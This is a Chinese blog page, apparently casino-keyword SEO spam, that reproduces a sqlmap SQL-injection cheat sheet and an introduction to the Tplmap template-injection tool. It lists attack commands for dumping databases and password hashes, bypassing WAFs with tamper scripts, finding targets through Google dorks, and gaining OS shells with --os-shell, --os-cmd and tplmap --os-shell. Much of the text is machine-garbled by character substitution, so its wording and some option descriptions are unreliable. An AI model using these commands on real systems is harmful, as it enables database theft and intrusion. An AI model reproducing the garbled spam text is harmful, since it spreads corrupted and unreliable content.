美高梅开户 4

美高梅开户

美高梅开户–tables拆数据库表,Tplmap – 扫描服务器端模板注入漏洞的开源工具

8 12月 , 2019  

原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

Tplmap是叁个python工具,能够经过应用沙箱转义手艺找到代码注入和劳动器端模板注入(SSTI)漏洞。该工具可以在重重模板引擎中运用SSTI来访问目的文件或操作系统。一些受协理的模板引擎包涵PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja2和Tornado。该工具得以进行对那一个模板引擎的盲注入,并持有实行远程命令的本领。

Sqlmap:

  • 日常注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=1” –dbs   查看全体数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包进行活动post注入(也能够步入http尾部的妄动地方注入,只要在注入地点步入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选拔sqlmap暗许选项卡塔尔(قطر‎

  • -p  (参数选用卡塔尔国

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为平时扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出指定表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*举目四望注入点*/

sqlmap.py -u “url” –dbs
/*列出具有数据库*/

sqlmap.py -u “url” –current-db
/*列出近来数据库*/

sqlmap.py -u “url” –current-user
/*列出脚下顾客*/

sqlmap.py -u “url” –tables -D
“当前数据库名” /*拆除与搬迁当前多少库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数码库名” /*拆解钦赐表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环顾注入点*/

sqlmap.py -u “url” –dbs
/*列出装有数据库*/

sqlmap.py -u “url” –current-db
/*列出脚下数据库*/

sqlmap.py -u “url” –current-user
/*列出当下客商*/

sqlmap.py -u “url” –tables -D
“当前多少库名” /*拆除当前数量库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数量库名” /*拆除钦点表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSE中华VVE翼虎操作和MYSQL是相似的!!!不以为奇的二种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp大概www.xxx.com/php” –cookie “参数名如id=1” –level
2/*level为进步权限*/

哪些数据库就依照上边包车型大巴数据库加上cookie语句拆解就能够了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文本然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文书名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

8.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

关于tamper脚本详细表达在本博客中有,链接为:

9.将注入语句插入到钦定地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

稍微网站是利用伪静态的页面使用SQLMAP的常备注入是老大的,所以SQLMAP提供了”*”参数将SQL语句插入钦定地点,日常用于伪静态注入。

在采取HTTP注入时行使-r参数也得以直接在文书中增加*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.选取Google语法搜索注入(Googlehack卡塔尔(英语:State of Qatar):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻找语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 突显程序的版本号并脱离

-h, –help 突显此扶助音信并退出

-v VE大切诺基Libratone 详细等第:0-6(默感觉1)

Target(目标):

以下起码要求设置当中一个精选,设置目标UHavalL。

-d DIRECT 间接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日记中解析目的。

-r REQUESTFILE
从三个文书中载入HTTP诉求。

-g GOOGLEDO君越K 管理Googledork的结果作为指标U奇骏L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

那一个选用能够用来钦定咋样连接到对象ULacrosseL。

–data=DATA 通过POST发送的多寡字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode UOdysseyL
编码生成的cookie注入

–drop-set-cookie 忽视响应的Set –
Cookie头音信

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADELacrosseS
换行分开,参与此外的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM卡塔尔(قطر‎

–auth-cred=ACRED
HTTP身份验证凭据(客商名:密码)

–auth-cert=ACERT
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UENCOREL

–proxy-cred=PCRED
HTTP代理身份验证凭据(客户名:密码)

–ignore-proxy 忽视系统暗中同意的HTTP代理

–delay=DELAY
在每一种HTTP央浼之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的年华(默以为30秒)

–retries=RETEnclaveIES
连接超时后重新连接的岁月(暗许3)

–scope=SCOPE
从所提供的代理日志中过滤器指标的正则表明式

–safe-url=SAFU奥德赛L
在测量检验过程中临时访问的url地址

–safe-freq=SAFREQ
一次访谈之间测验央浼,给出安全的U科雷傲L

Optimization(优化):

那几个采取可用于优化SqlMap的性质。

-o 开启全体优化开关

–predict-output 预测不足为奇的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从不曾实际的HTTP响应体中追寻页面长度

–threads=THREADS
最大的HTTP(S)央求并发量(默认为1)

Injection(注入):

那一个选取能够用来钦命测量检验哪些参数,
提供自定义的流入payloads和可选窜改脚本。

-p TESTPARAMETE君越 可测量试验的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为那个值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPETiguan使用给定的台本(S)窜改注入数据

Detection(检测):

那几个选取能够用来钦定在SQL盲注时怎么样解析和相比HTTP响应页面包车型大巴从头到尾的经过。

–level=LEVEL
试行测验的阶段(1-5,默以为1)

–risk=KoleosISK
履行测验的风险(0-3,默以为1)

–string=STSportageING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相配正则表明式

–text-only 仅依照在文件内容相比较网页

Techniques(技巧):

这几个采用可用来调度具体的SQL注入测试。

–technique=TECH
SQL注入才能测量检验(默许BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(默感到5秒)

–union-cols=UCOLS
定列范围用于测量试验UNION查询注入

–union-char=UCHA奥迪Q5用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
实行检查分布的DBMS版本指纹

Enumeration(枚举):

那个选用能够用来列举后端数据库管理种类的音信、表中的构造和数据。此外,您还是能运营您自身

的SQL语句。

-b, –banner
检索数据库管理体系的标志

–current-user
检索数据库管理类别当下客商

–current-db
检索数据库管理连串当下数据库

–is-dba 检查实验DBMS当前客商是不是DBA

–users 枚举数据库管理体系客商

–passwords
枚举数据库管理体系客户密码哈希

–privileges
枚举数据库管理体系顾客的权位

–roles 枚举数据库管理种类客户的剧中人物

–dbs 枚举数据库管理连串数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理类别的数据库中的表项

–dump-all
转储全部的DBMS数据库表中的条文

–search
寻觅列(S),表(S)和/或数据库名称(S)

-D DB 要扩充枚举的数据库名

-T TBL 要开展枚举的数码库表

-C COL 要开展枚举的多少库列

-U USE奥德赛 用来进展枚举的数据库用户

–exclude-sysdbs
枚举表时消逝系统数据库

–start=LIMITSTART
第叁个查询输出步入检索

–stop=LIMITSTOP
最终查询的输出进入检索

–first=FI途锐STCHA智跑第叁个查询输出字的字符检索

–last=LASTCHAPAJERO最后查询的出口字字符检索

–sql-query=QUEEvoqueY 要实行的SQL语句

–sql-shell 提醒人机联作式SQL的shell

Brute force(蛮力):

那些接收能够被用来运维蛮力检查。

–common-tables 检查存在合营表

–common-columns 检查存在合营列

User-defined function
injection(客商自定义函数注入):

这几个选取能够用来创设客户自定义函数。

–udf-inject 注入顾客自定义函数

–shared-lib=SHLIB 分享库的本地路线

File system
access(访问文件系统):

这个选拔能够被用来访问后端数据库管理系列的最底层文件系统。

–file-read=兰德酷路泽FILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的当和姑件

–file-dest=DFILE
后端的数据库管理种类写入文件的绝对路线

Operating system
access(操作系统访谈):

那些采取能够用于访谈后端数据库处理类别的底层操作系统。

 

–os-cmd=OSCMD 实践操作系统命令

–os-shell 交互作用式的操作系统的shell

–os-pwn 获取二个OOB
shell,meterpreter或VNC

–os-smbrelay 意气风发键获取叁个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进度缓冲区溢出利用

–priv-esc 数据库进度客户权限提高

–msf-path=MSFPATH Metasploit Framework本地的设置路线

–tmp-path=TMPPATH
远程临时文件目录的相对路线

Windows注册表访问:

这个选取能够被用来访问后端数据库管理体系Windows注册表。

–reg-read 读叁个Windows注册表项值

–reg-add
写贰个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows挂号表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

这几个选用能够用来安装有些肖似的干活参数。

-t TRAFFICFILE
记录全数HTTP流量到叁个文本文件中

-s SESSIONFILE
保存和卷土重来检索会话文件的具有数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽视在对话文件中寄放的询问结果

–eta 突显种种输出的预测到达时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问顾客输入,使用全体暗中认可配置。

Miscellaneous(杂项):

–beep 开采SQL注入时提醒

–check-payload
IDS对流入payloads的检查实验测量检验

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目的UQashqaiL的剖释和测量试验情势

–gpage=GOOGLEPAGE
从内定的页码使用Googledork结果

–page-rank Googledork结果展现网页排行(PEscort)

–parse-errors
从响应页面拆解解析数据库管理类其余错误音信

–replicate
复制转储的数额到叁个sqlite3数据库

–tor 使用暗中同意的Tor(比达尔ia/ Privoxy/
Polipo)代理地址

–wizard 给初级客商的简要向导分界面

安装Tplmap

美高梅开户 1

能够经过应用以下github链接从github存款和储蓄Cook隆该工具来安装Tplmap。

git clone

打响安装后,将引得路线校正为tplmap安装文件以运转tplmap.py。

测量检验Web应用程序中的漏洞

Tplmap不止选择了文件系统的漏洞,何况还存有应用不一样参数访问底层操作系统的技巧。以下显示屏截图呈现了可用以访谈操作系统的不等参数选项

美高梅开户 2

以下命令可用于测量试验指标U奥迪Q5L中的易受攻击的参数。

./tplmap.py -u <‘指标网站’>

实行该命令后,该工具会针对多少个插件测量检验对象UENVISIONL以寻觅代码注入时机。

美高梅开户 3

生机勃勃旦发掘缺欠,该工具将出口有关目的中或然注入点的详细消息。那几个总结GET参数值(无论是id如故名称),模板引擎(比方Tornado),OS(举例Linux)和注入技巧(举个例子渲染,盲)。

美高梅开户 4

对此易受攻击的对象操作系统,能够使用后面提到的中间两个参数重国民党的新生活运动行tplmap命令。比方,我们能够透过以下措施将-os
-shell选项与tplmap命令一同使用。

./tplmap.py –os-shell -u <‘目的网站’>

-os -shell选项在指标操作系统上运转伪终端以实践所需的代码。

随笔出处:latesthackingnews回去乐乎,查看更多

小编:


相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图